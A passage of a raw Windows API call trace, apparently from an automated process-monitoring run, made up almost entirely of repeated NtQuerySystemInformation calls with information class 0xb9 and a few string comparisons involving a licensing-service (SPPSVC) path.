NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0272.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0272.538] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x28, ResultLength=0x0) [0272.545] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x50, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0272.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x50, ResultLength=0x0) [0272.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x50, ResultLength=0x0) [0272.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x50, ResultLength=0x0) [0272.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0272.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0272.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0272.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0272.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0272.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0272.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0272.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 